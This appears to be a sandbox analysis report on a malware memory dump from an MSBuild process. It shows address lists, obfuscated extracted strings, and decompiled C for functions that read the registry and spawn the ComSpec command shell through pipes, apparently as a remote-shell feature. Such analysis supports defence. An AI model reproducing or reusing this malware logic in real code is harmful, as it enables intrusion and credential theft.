                        0x0040ffe3
                        0x0040ffe7
                        0x0040ffea
                        0x0040ffee
                        0x0040fff2
                        0x0040fff6
                        0x0040fffa
                        0x0040fffe
                        0x00410003
                        0x00410008
                        0x00410167
                        0x0041017e
                        0x00000000
                        0x0041017e
                        0x00410013
                        0x00410017
                        0x00000000
                        0x00000000
                        0x0041001d
                        0x00410021
                        0x00410024
                        0x00410028
                        0x0041002d
                        0x0041002e
                        0x00410034
                        0x0041003c
                        0x00410044
                        0x0041004d
                        0x00410056
                        0x0041005f
                        0x00410068
                        0x00410071
                        0x00410079
                        0x0041007c
                        0x00000000
                        0x0041007c
                        0x00000000
                        0x0040ffc5
                        0x00410081
                        0x00410083
                        0x00410085
                        0x00410088
                        0x0041008d
                        0x0041008d
                        0x00410092
                        0x00410099
                        0x0041009d
                        0x004100a5
                        0x004100ad
                        0x004100b8
                        0x004100bb
                        0x004100c6
                        0x004100ca
                        0x004100d1
                        0x004100e2
                        0x004100e2
                        0x004100e7
                        0x004100ee
                        0x004100f1
                        0x004100f5
                        0x004100fc
                        0x004100fd
                        0x004100fd
                        0x00410104
                        0x00410107
                        0x0041010c
                        0x00410112
                        0x00410116
                        0x00410136
                        0x0041013e
                        0x00410146
                        0x00410118
                        0x00410118
                        0x00410120
                        0x00410128
                        0x00410130
                        0x00410130
                        0x00410155
                        0x00410158
                        0x0041015d
                        0x00000000
                        0x00410160
                        0x0040fed7
                        0x0040feda
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $ $%.2d/%.2d/%d %.2d:%.2d:%.2d$Ed5FWSQid_4idLCldjfD$kernel32.dll$psapi.dll
                        • API String ID: 0-116260847
                        • Opcode ID: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
                        • Instruction ID: 6fadafcb3b73e839ba5121377a1d1d4624def229cb7cc3727062cbee2f3d546e
                        • Opcode Fuzzy Hash: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
                        • Instruction Fuzzy Hash: BB81C3B0408741AED720AF25C54566FBBE4AF85748F018D2EF8D887351E7BDC989CB46
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040B1F4 Relevance: 7.6, Strings: 6, Instructions: 67COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @$MT_qUDrj\FWk4iiC\%6\$MT_qUDrj\FWk4iiC\%6\%6\FC4R$PQ00dR5zd064WR$XR65Cii a40dY5W0Z$x64
                        • API String ID: 0-4110341741
                        • Opcode ID: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
                        • Instruction ID: 72ec6481281fc5666a7dbf46cbeff2a2701b551c42623141a7dd164dfcf0ae83
                        • Opcode Fuzzy Hash: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
                        • Instruction Fuzzy Hash: E221E0B0508301AED300AF26D54925EFBF4EF88308F418D2EE8D897241D7BD9685CB8A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040EDD6 Relevance: 6.5, Strings: 5, Instructions: 236COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !$0x%02hhX$0x05$0x0D$encrypted_key
                        • API String ID: 0-939079894
                        • Opcode ID: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
                        • Instruction ID: 786053efb03fb7134250340436023ef553204ed8f41ee6c066ba5e47f52fe47d
                        • Opcode Fuzzy Hash: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
                        • Instruction Fuzzy Hash: FEC1EAB1A053198FDB50DF25C844B9EBBF0BF45308F0588AEE489E7681D7789A84CF46
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00411D8C Relevance: 6.4, Strings: 5, Instructions: 195COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $($($6$BM
                        • API String ID: 0-2637400849
                        • Opcode ID: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
                        • Instruction ID: c42d9fa6f562a18c3eedbb1c72d559f421865ac330c7369b2ec7bacda9b62638
                        • Opcode Fuzzy Hash: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
                        • Instruction Fuzzy Hash: 4781BDB05093409FD310EF6AD68475BBBE4AF88744F40892EF58887351E7B9D8888B5B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00421320 Relevance: 6.4, Strings: 5, Instructions: 164COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $../nettle-3.5.1/ctr16.c$c$length - i < CTR_BUFFER_LIMIT$length < 16
                        • API String ID: 0-535899598
                        • Opcode ID: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
                        • Instruction ID: 595662ab794f8c563696035dacf2dbdab12226766188b8df76e1304a900497cc
                        • Opcode Fuzzy Hash: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
                        • Instruction Fuzzy Hash: 1E71DDB5A083199FDB00EF69D48859EBBE0EF88354F01C92EF89997351C3389854CF96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040C2DB Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %6\.sQ0sid\CYYWQR56.fli$<RCld>$<s0W5WYWi>$<sC66gW0S>$APPDATA
                        • API String ID: 0-1218082621
                        • Opcode ID: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
                        • Instruction ID: 6048a10f2db6f6121dbf09b1e91f7eeb88fe885a8aaa66a3f769cde923567c5e
                        • Opcode Fuzzy Hash: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
                        • Instruction Fuzzy Hash: EC41D8B0408311DAD310AF25D58526EBAF4BF84758F50CA2FE4D897381D77C8585DB5B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004135F2 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $DiiWYC5dDRSXR454Ci4kdM4S$PIdYwqWwdRFdlVd06I4s$_0ddM4S$advapi32.dll
                        • API String ID: 0-1236196231
                        • Opcode ID: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
                        • Instruction ID: 116aa698c271bca6352efc5b2b04a0db36bd32a1f1fa5c071599b3e3fb9e0c6d
                        • Opcode Fuzzy Hash: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
                        • Instruction Fuzzy Hash: FC31D7B0509351ABD740AF65D59831FBAE0AF84348F41982EF5C49B381D7BDC5848B87
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00410FC4 Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                        Download Yara Rule
                        C-Code - Quality: 61%
                        			E00410FC4(void* __ecx, signed int _a4, signed int _a8, signed int _a12, void* _a16, intOrPtr _a32) {
				signed int _v0;
				signed int _v24;
				intOrPtr _v32;
				signed int _v44;
				char _v544;
				char _v548;
				char _v556;
				char _v568;
				char _v572;
				signed int _v576;
				void* _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				char* _v632;
				char _v636;
				char _v640;
				intOrPtr _v644;
				signed int _v648;
				signed int* _v652;
				signed int _v656;
				signed int _v660;
				intOrPtr _v664;
				signed int _v668;
				intOrPtr _v692;
				signed int _t122;
				signed int _t129;
				signed int _t133;
				signed int _t134;
				void* _t136;
				void* _t137;

				_t137 = _t136 - 0x24c;
				_t134 = _a8;
				_t133 = _a12;
				_t122 = _a32 - 1;
				if(_t122 > 5) {
					L28:
					_t129 = 0;
					L29:
					return _t129;
				}
				switch( *((intOrPtr*)(_t122 * 4 +  &M0042444C))) {
					case 0:
						_v580 = 0;
						_v584 = 0xf003f;
						_v588 = 0;
						_v592 = 0;
						_v572 =  &_v548;
						_t125 =  &_v556;
						_v596 = 0;
						_v600 = _t133;
						_v604 = _t134;
						_v576 = _t125;
						L0041F454();
						_t137 = _t137 - 0x24;
						if(_t125 != 0) {
							goto L28;
						}
						_v620 = _t133;
						_v624 = _t134;
						_v628 = 1;
						goto L7;
					case 1:
						__eax =  &_v556;
						_v592 = 0x2001f;
						_v596 = 0;
						_v600 = __edi;
						_v604 = __esi;
						_v588 = __eax;
						L0041F42C();
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax = _a8;
						_v616 = 0;
						_v620 = __ebp;
						_v604 = _a8;
						__eax = _a4;
						_v608 = _a4;
						__eax = _v0;
						_v612 = _v0;
						__eax = _v576;
						_v624 = __eax;
						L0041F41C();
						__esp = __esp - 0x18;
						__ebx = __eax;
						__eax = _v600;
						_v648 = __eax;
						L0041F45C();
						_push(__eax);
						if(__ebx != 0) {
							goto L28;
						}
						_v632 = __edi;
						_v636 = __esi;
						_v640 = 2;
						L7:
						_t130 =  &_v580;
						_v632 = "%c%.8x%s";
						_v636 = 0x204;
						_v640 =  &_v580;
						_t126 = E004127A8();
						goto L14;
					case 2:
						__eax = E0041086B(__ecx, __esi, __edi, __ebp);
						__bl = __al;
						if(__al == 0) {
							goto L28;
						}
						_v588 = __esi;
						__esi =  &_v544;
						_v580 = __ebp;
						_v584 = __edi;
						__eax = E004127A8( &_v544, 0x204, "%c%.8x%s%s", 3);
						if(__eax == 0) {
							goto L16;
						}
						goto L27;
					case 3:
						__eax =  &_v556;
						_v592 = 0x2001f;
						_v596 = 0;
						_v600 = __edi;
						_v604 = __esi;
						_v588 = __eax;
						L0041F42C();
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax = _v576;
						_v620 = __ebp;
						_v624 = __eax;
						L0041F444();
						__ebx = __eax;
						_push(__ecx);
						_push(__ecx);
						__eax = _v584;
						_v632 = __eax;
						L0041F45C();
						_push(__eax);
						if(__ebx != 0) {
							goto L28;
						}
						__ebx =  &_v576;
						_v612 = __ebp;
						_v616 = __edi;
						_v620 = __esi;
						__eax = E004127A8( &_v576, 0x204, "%c%.8x%s\\%s", 4);
						L14:
						if(_t126 != 0) {
							_v628 = _t126;
							E00405D7D(_t132, _v32, 0xe8, _t130);
						}
						L16:
						_t129 = 1;
						goto L29;
					case 4:
						goto L28;
					case 5:
						__eax =  &_v556;
						_v592 = 0x2001f;
						_v596 = 0;
						_v600 = __edi;
						_v604 = __esi;
						_v588 = __eax;
						L0041F42C();
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax =  &_v572;
						_v608 = 0;
						_v616 = 0;
						_v620 = __ebp;
						__ebx = 0;
						_v604 =  &_v572;
						__eax =  &_v568;
						_v612 =  &_v568;
						__eax = _v576;
						_v624 = __eax;
						L0041F424();
						__esp = __esp - 0x18;
						if(__eax != 0) {
							L25:
							__eax = _v600;
							_v648 = __eax;
							L0041F45C();
							_push(__eax);
							if(__bl == 0) {
								goto L29;
							}
							__eax = _v24;
							_v636 = __esi;
							__esi =  &_v592;
							_v624 = __ebp;
							_v632 = __edi;
							_v640 = 6;
							_v644 = 0x42443c;
							_v628 = _v24;
							_v648 = 0x204;
							_v652 =  &_v592;
							__eax = E004127A8();
							if(__eax == 0) {
								goto L29;
							}
							L27:
							_v592 = __eax;
							_a4 = E00405D7D(__edx, _a4, 0xe8, __esi);
							goto L29;
						}
						__eax = _v596;
						_v648 = __eax;
						L0041F714();
						_v588 = __eax;
						if(__eax == 0) {
							goto L25;
						}
						_v632 = __eax;
						__eax =  &_v592;
						__edx =  &_v596;
						_v640 = 0;
						_v644 = __ebp;
						_v636 =  &_v592;
						__eax = _v600;
						_v628 = __edx;
						_v648 = __eax;
						L0041F424();
						__esp = __esp - 0x18;
						if(__eax == 0) {
							__eax = _v620;
							_v664 = 0;
							_v652 = _v620;
							__eax = _v612;
							_v656 = _v612;
							__eax = _v616;
							_v660 = _v616;
							__eax = _v44;
							_v668 = _v44;
							__eax = _v624;
							 *__esp = __eax;
							L0041F41C();
							__esp = __esp - 0x18;
							if(__eax != 0) {
								goto L21;
							}
							__eax = _v648;
							_v692 = __ebp;
							 *__esp = __eax;
							L0041F444();
							_push(__edx);
							_push(__edx);
							__ebx = 0 | __eax == 0x00000000;
							L24:
							 &_v636 = E00407F59( &_v636);
							goto L25;
						}
						L21:
						__ebx = 0;
						goto L24;
				}
			}











































                        0x00410fc8
                        0x00410fd5
                        0x00410fdc
                        0x00410fea
                        0x00410fee
                        0x004113a8
                        0x004113a8
                        0x004113aa
                        0x004113b6
                        0x004113b6
                        0x00410ff4
                        0x00000000
                        0x00410fff
                        0x00411007
                        0x0041100f
                        0x00411017
                        0x0041101f
                        0x00411023
                        0x00411027
                        0x0041102f
                        0x00411033
                        0x00411036
                        0x0041103a
                        0x0041103f
                        0x00411044
                        0x00000000
                        0x00000000
                        0x0041104a
                        0x0041104e
                        0x00411052
                        0x00000000
                        0x00000000
                        0x0041105f
                        0x00411063
                        0x0041106b
                        0x00411073
                        0x00411077
                        0x0041107a
                        0x0041107e
                        0x00411083
                        0x00411088
                        0x00000000
                        0x00000000
                        0x0041108e
                        0x00411095
                        0x0041109d
                        0x004110a1
                        0x004110a5
                        0x004110ac
                        0x004110b0
                        0x004110b7
                        0x004110bb
                        0x004110bf
                        0x004110c2
                        0x004110c7
                        0x004110ca
                        0x004110cc
                        0x004110d0
                        0x004110d3
                        0x004110da
                        0x004110db
                        0x00000000
                        0x00000000
                        0x004110e1
                        0x004110e5
                        0x004110e9
                        0x004110f1
                        0x004110f1
                        0x004110f5
                        0x004110fd
                        0x00411105
                        0x00411108
                        0x00000000
                        0x00000000
                        0x0041111d
                        0x00411124
                        0x00411126
                        0x00000000
                        0x00000000
                        0x0041112c
                        0x00411130
                        0x00411134
                        0x00411138
                        0x00411157
                        0x0041115e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00411169
                        0x0041116d
                        0x00411175
                        0x0041117d
                        0x00411181
                        0x00411184
                        0x00411188
                        0x0041118d
                        0x00411192
                        0x00000000
                        0x00000000
                        0x00411198
                        0x0041119c
                        0x004111a0
                        0x004111a3
                        0x004111a8
                        0x004111aa
                        0x004111ab
                        0x004111ac
                        0x004111b0
                        0x004111b3
                        0x004111ba
                        0x004111bb
                        0x00000000
                        0x00000000
                        0x004111c1
                        0x004111c5
                        0x004111c9
                        0x004111cd
                        0x004111ec
                        0x004111f1
                        0x004111f3
                        0x004111f5
                        0x0041120f
                        0x0041120f
                        0x00411214
                        0x00411214
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0041121b
                        0x0041121f
                        0x00411227
                        0x0041122f
                        0x00411233
                        0x00411236
                        0x0041123a
                        0x0041123f
                        0x00411244
                        0x00000000
                        0x00000000
                        0x0041124a
                        0x0041124e
                        0x00411256
                        0x0041125e
                        0x00411262
                        0x00411264
                        0x00411268
                        0x0041126c
                        0x00411270
                        0x00411274
                        0x00411277
                        0x0041127c
                        0x00411281
                        0x00411337
                        0x00411337
                        0x0041133b
                        0x0041133e
                        0x00411345
                        0x00411346
                        0x00000000
                        0x00000000
                        0x00411348
                        0x0041134f
                        0x00411353
                        0x00411357
                        0x0041135b
                        0x0041135f
                        0x00411367
                        0x0041136f
                        0x00411373
                        0x0041137b
                        0x0041137e
                        0x00411385
                        0x00000000
                        0x00000000
                        0x00411387
                        0x00411387
                        0x004113a1
                        0x00000000
                        0x004113a1
                        0x00411287
                        0x0041128b
                        0x0041128e
                        0x00411295
                        0x00411299
                        0x00000000
                        0x00000000
                        0x0041129f
                        0x004112a3
                        0x004112a7
                        0x004112ab
                        0x004112b3
                        0x004112b7
                        0x004112bb
                        0x004112bf
                        0x004112c3
                        0x004112c6
                        0x004112cb
                        0x004112d0
                        0x004112d6
                        0x004112da
                        0x004112e2
                        0x004112e6
                        0x004112ea
                        0x004112ee
                        0x004112f2
                        0x004112f6
                        0x004112fd
                        0x00411301
                        0x00411305
                        0x00411308
                        0x0041130d
                        0x00411312
                        0x00000000
                        0x00000000
                        0x00411314
                        0x00411318
                        0x0041131c
                        0x0041131f
                        0x00411326
                        0x00411327
                        0x00411328
                        0x0041132b
                        0x00411332
                        0x00000000
                        0x00411332
                        0x004112d2
                        0x004112d2
                        0x00000000
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %c%.8x%s$%c%.8x%s%s$%c%.8x%s\%s$?
                        • API String ID: 0-1127014073
                        • Opcode ID: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
                        • Instruction ID: 5e49c9d9379b1dd87b15daa38270e0e0a3fc6f91244b4719e2a77dc22190009b
                        • Opcode Fuzzy Hash: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
                        • Instruction Fuzzy Hash: DAB1CFB0909345AFD700EF69D18469FFBE4BF84744F40892EF99887311D7B8D5898B46
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004113B8 Relevance: 5.2, Strings: 4, Instructions: 198COMMON
                        Download Yara Rule
                        C-Code - Quality: 63%
                        			E004113B8(void* __eax, void* __ecx, char* __edx, void* __eflags, char** _a4) {
				char _v544;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				short _v600;
				intOrPtr _v604;
				char _v612;
				char _v628;
				char* _v632;
				char* _v636;
				char _v640;
				char _v656;
				char _v660;
				char _v668;
				intOrPtr _v672;
				char* _v688;
				intOrPtr _v692;
				char* _v720;
				intOrPtr _v724;
				char* _v728;
				char* _v732;
				char* _v736;
				char* _v740;
				char* _v744;
				char* _v748;
				char* _v752;
				char* _v756;
				char* _v760;
				char* _v764;
				char* _v768;
				char _v772;
				intOrPtr _v776;
				char* _v796;
				intOrPtr _v800;
				char* _v804;
				char* _v808;
				char* _v812;
				char* _v824;
				intOrPtr _v828;
				char* _v832;
				char* _v836;
				char* _v844;
				char* _v848;
				intOrPtr _v852;
				char* _v856;
				void* _t85;
				char* _t92;
				char* _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				char* _t100;
				char* _t102;
				void* _t106;
				char* _t110;
				char** _t118;
				void* _t119;
				char* _t120;
				char* _t121;
				char* _t122;
				char* _t123;
				char* _t125;
				char* _t126;
				char* _t127;
				char** _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				char** _t132;

				_t120 = __edx;
				_t119 = __ecx;
				_t125 =  &_v544;
				_v732 = "ComSpec";
				_t118 = _a4;
				L0041F724();
				E004127A8(_t125, 0x204, "%s", __eax);
				_t85 = E00406F1A(_t120, _t125);
				if(_t85 == 0) {
					_v732 = "WINDIR";
					L0041F724();
					E004127A8(_t125, 0x204, E004081AA("%6\\6Z65dlNh\\YlS.dfd"), _t85);
				}
				if(E00406F1A(_t120, _t125) == 0) {
					L6:
					_v720 = 0;
					L7:
					return E00405D7D(_t120,  *_t118, 0xb9, 0);
				}
				_t122 =  &_v612;
				_t127 =  &_v628;
				_v724 = 0x44;
				_v728 = 0;
				_v636 = 0;
				_v732 = _t122;
				_v632 = 1;
				E004129E4();
				E004129E4(_t127, 0, 0x10);
				_t121 =  &_v640;
				_v720 = 0;
				_v728 =  &_v656;
				_t92 =  &_v660;
				_v724 = _t121;
				_v672 = _t121;
				_v732 = _t92;
				L0041F674();
				_t130 = _t129 - 0x10;
				_t120 = _v688;
				_v736 = 0;
				if(_t92 == 0) {
					goto L7;
				}
				_t93 =  &_v668;
				_v740 = _t120;
				_v744 = 0x42b5d4;
				_v748 = _t93;
				L0041F674();
				_t131 = _t130 - 0x10;
				if(_t93 == 0) {
					goto L6;
				}
				_v764 = _t122;
				L0041F59C();
				_push(_t93);
				_t94 = _v692;
				_v732 = _t127;
				_v736 = _t122;
				_v584 = _t94;
				_v588 = _t94;
				_t95 = _v688;
				_v740 = 0;
				_v744 = 0;
				_v748 = 0;
				_v752 = 1;
				_v756 = 0;
				_v760 = 0;
				_v764 = _t125;
				_v768 = 0;
				_v592 = _t95;
				_v604 = 0x101;
				_v600 = 0;
				L0041F66C();
				_t132 = _t131 - 0x28;
				if(_t95 == 0) {
					goto L6;
				}
				_v808 = _v732;
				L0041F694();
				_push(_t122);
				_t123 = 0;
				_v812 = _v732;
				L0041F694();
				_push(_t127);
				_v804 = 0xffffffff;
				_v808 = _t125;
				_t128 =  &_v728;
				_v812 = 0xb6;
				_v732 = 0;
				 *_t132 =  *_t118;
				E00405D7D(_t120);
				while(1) {
					_t100 = _v744;
					_v796 = 0;
					_v800 = _t128;
					_v804 = 0;
					_v808 = 0;
					_v812 = 0;
					 *_t132 = _t100;
					_v728 = 0;
					L0041F534();
					_t132 = _t132 - 0x18;
					if(_t100 == 0) {
						goto L17;
					}
					L10:
					_t126 = _v752;
					if(_t126 != 0 &&  *0x42b5d0 != 0) {
						if(_t123 >= _t126) {
							L15:
							_v824 = 0;
							_v828 = _t128;
							_v832 = _t126;
							_v836 = _v756;
							_t110 = _v768;
							 *_t132 = _t110;
							L0041F51C();
							_t132 = _t132 - 0x14;
							if(_t110 != 0) {
								_v856 = 0xb7;
								_v848 = _v772;
								_v852 = _v776;
								 *_t132 =  *_t118;
								if(E00405D7D(_t120) + 1 != 0) {
									while(1) {
										_t100 = _v744;
										_v796 = 0;
										_v800 = _t128;
										_v804 = 0;
										_v808 = 0;
										_v812 = 0;
										 *_t132 = _t100;
										_v728 = 0;
										L0041F534();
										_t132 = _t132 - 0x18;
										if(_t100 == 0) {
											goto L17;
										}
										goto L10;
									}
								}
								goto L17;
							}
						} else {
							 *_t132 = _t126;
							L0041F714();
							_v756 = _t100;
							if(_t100 != 0) {
								_t123 = _t126;
								goto L15;
							}
						}
					}
					L18:
					if( *0x42b5d0 != 0) {
						 *_t132 = 0x96;
						E00407EF4();
						continue;
					}
					_t102 = _v768;
					 *_t132 = _t102;
					L0041F694();
					_push(_t102);
					_v844 =  *0x42b5d4;
					L0041F694();
					_v844 = 0;
					_v848 = _v744;
					L0041F4E4();
					_v844 = 0;
					_v848 = 0;
					_v852 = 0xb8;
					_v856 =  *_t118;
					_t106 = E00405D7D(_t120, _t119, _t119, _t120);
					if(_v772 != 0) {
						return E00407F59( &_v772);
					}
					return _t106;
					L17:
					 *0x42b5d0 = 0;
					goto L18;
				}
			}







































































                        0x004113b8
                        0x004113b8
                        0x004113c2
                        0x004113c9
                        0x004113d0
                        0x004113d7
                        0x004113f3
                        0x004113fb
                        0x00411402
                        0x00411404
                        0x0041140b
                        0x00411431
                        0x00411431
                        0x00411440
                        0x0041157a
                        0x0041157a
                        0x00411582
                        0x00000000
                        0x00411597
                        0x00411446
                        0x0041144a
                        0x0041144e
                        0x00411456
                        0x0041145e
                        0x00411466
                        0x00411469
                        0x00411471
                        0x00411489
                        0x00411492
                        0x00411496
                        0x0041149e
                        0x004114a2
                        0x004114a6
                        0x004114aa
                        0x004114ae
                        0x004114b1
                        0x004114b6
                        0x004114bb
                        0x004114bf
                        0x004114c7
                        0x00000000
                        0x00000000
                        0x004114cd
                        0x004114d1
                        0x004114d5
                        0x004114dd
                        0x004114e0
                        0x004114e5
                        0x004114ea
                        0x00000000
                        0x00000000
                        0x004114f0
                        0x004114f3
                        0x004114f8
                        0x004114f9
                        0x004114fd
                        0x00411501
                        0x00411505
                        0x0041150c
                        0x00411513
                        0x00411517
                        0x0041151f
                        0x00411527
                        0x0041152f
                        0x00411537
                        0x0041153f
                        0x00411547
                        0x0041154b
                        0x00411552
                        0x00411559
                        0x00411564
                        0x0041156e
                        0x00411573
                        0x00411578
                        0x00000000
                        0x00000000
                        0x004115a5
                        0x004115a8
                        0x004115ad
                        0x004115b2
                        0x004115b4
                        0x004115b7
                        0x004115bc
                        0x004115bd
                        0x004115c5
                        0x004115c9
                        0x004115cd
                        0x004115d7
                        0x004115df
                        0x004115e2
                        0x004115e7
                        0x004115e7
                        0x004115eb
                        0x004115f3
                        0x004115f7
                        0x004115ff
                        0x00411607
                        0x0041160f
                        0x00411612
                        0x0041161a
                        0x0041161f
                        0x00411624
                        0x00000000
                        0x00000000
                        0x00411626
                        0x00411626
                        0x0041162c
                        0x00411639
                        0x0041164d
                        0x00411651
                        0x00411659
                        0x0041165d
                        0x00411661
                        0x00411665
                        0x00411669
                        0x0041166c
                        0x00411671
                        0x00411676
                        0x0041167c
                        0x00411684
                        0x0041168c
                        0x00411692
                        0x0041169b
                        0x004115e7
                        0x004115e7
                        0x004115eb
                        0x004115f3
                        0x004115f7
                        0x004115ff
                        0x00411607
                        0x0041160f
                        0x00411612
                        0x0041161a
                        0x0041161f
                        0x00411624
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00411624
                        0x004115e7
                        0x00000000
                        0x0041169b
                        0x0041163b
                        0x0041163b
                        0x0041163e
                        0x00411645
                        0x00411649
                        0x0041164b
                        0x00000000
                        0x0041164b
                        0x00411649
                        0x00411639
                        0x004116ab
                        0x004116b2
                        0x0041171c
                        0x00411723
                        0x00000000
                        0x00411723
                        0x004116b4
                        0x004116b8
                        0x004116bb
                        0x004116c0
                        0x004116c6
                        0x004116c9
                        0x004116d3
                        0x004116db
                        0x004116de
                        0x004116e5
                        0x004116ed
                        0x004116f5
                        0x004116ff
                        0x00411702
                        0x0041170c
                        0x00000000
                        0x00411715
                        0x00411737
                        0x004116a1
                        0x004116a1
                        0x00000000
                        0x004116a1

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %6\6Z65dlNh\YlS.dfd$ComSpec$D$WINDIR
                        • API String ID: 0-1530679608
                        • Opcode ID: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
                        • Instruction ID: c0a2dff8ecfd3ca449ec7184aa16f3f0f3f293b9e2d18e22baf8a99b3bb4e763
                        • Opcode Fuzzy Hash: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
                        • Instruction Fuzzy Hash: F4919EB05087419FD710AF65C18875FBBE4AF84748F01892EE5D88B3A1D7B99489CF8A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040A4BC Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: MdYQ0Nh.Sii$m6CEd5mWnWRMd664WRaC5C$m6C_0ddrd5Q0RcQ88d0$m6CjRQld0C5dmWnWRMd664WR6
                        • API String ID: 0-3174184691
                        • Opcode ID: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
                        • Instruction ID: 94c08b94b57df9e53fa0a2455e2e566f66701f19132ff7a1c430a127e0c0603f
                        • Opcode Fuzzy Hash: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
